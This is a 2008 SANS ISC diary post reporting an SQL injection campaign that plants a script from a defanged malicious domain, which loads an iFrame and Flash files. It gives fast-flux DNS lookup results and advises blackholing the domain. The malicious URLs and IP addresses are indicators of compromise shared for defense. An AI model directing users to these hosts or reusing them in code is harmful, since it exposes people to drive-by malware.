Threat Level: green Handler on Duty: Russell Eubanks

SANS ISC: InfoSec Handlers Diary Blog - New sql injection site with fastflux hosting InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

New sql injection site with fastflux hosting

Published: 2008-06-02
Last Updated: 2008-06-02 22:13:22 UTC
by donald smith (Version: 1)
0 comment(s)

One of our frequent contributors notified us of a new sql injection site.
hxxp://en-us18.com/b.js is being injected via sql into websites.

When I googled for it I saw 560 injected webpages.
“b.js injects an iFrame which points to
hxxp://en-us18.com/cgi-bin/index.cgi?ad
which in turn embeds two Flash files:

advert.swf:
http://www.virustotal.com/analisis/d6ffe290e9938d3e646f82c536abd0c7
banner.swf:
http://www.virustotal.com/analisis/83be3d4d30eb60d92272625634a3babc” 

This appears to be fast fluxed or at least setup to change rapidly based on this dig output. 

dig www.en-us18.com
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 4, ADDITIONAL: 1
;; QUERY SECTION:
;;      www.en-us18.com, type = A, class = IN
;; ANSWER SECTION:
www.en-us18.com.        10M IN A        156.17.227.218
www.en-us18.com.        10M IN A        84.121.210.189
www.en-us18.com.        10M IN A        99.194.80.27
www.en-us18.com.        10M IN A        69.65.91.5
www.en-us18.com.        10M IN A        83.27.126.102
www.en-us18.com.        10M IN A        99.225.66.211
www.en-us18.com.        10M IN A        82.159.61.76
www.en-us18.com.        10M IN A        85.53.64.13
www.en-us18.com.        10M IN A        148.81.132.211
www.en-us18.com.        10M IN A        83.23.188.93
www.en-us18.com.        10M IN A        216.170.109.251
www.en-us18.com.        10M IN A        62.21.81.188
www.en-us18.com.        10M IN A        83.242.74.153

www.en-us18.com.        10M IN A        87.205.33.92
;; AUTHORITY SECTION:
en-us18.com.            1d18h57m52s IN NS  ns3.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns2.en-us18.com.

en-us18.com.            1d18h57m52s IN NS  ns4.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns1.en-us18.com.
;; ADDITIONAL SECTION:
ns1.en-us18.com.        1d21h10m38s IN A  75.110.190.181 

A second dig a few minutes later produced similar but slightly different results.
So this domain is changing. I guess they got tired of people blackholing their ip address.
So in that case I would recommend you dns blackhole that domain.

Keywords:
0 comment(s)
Diary Archives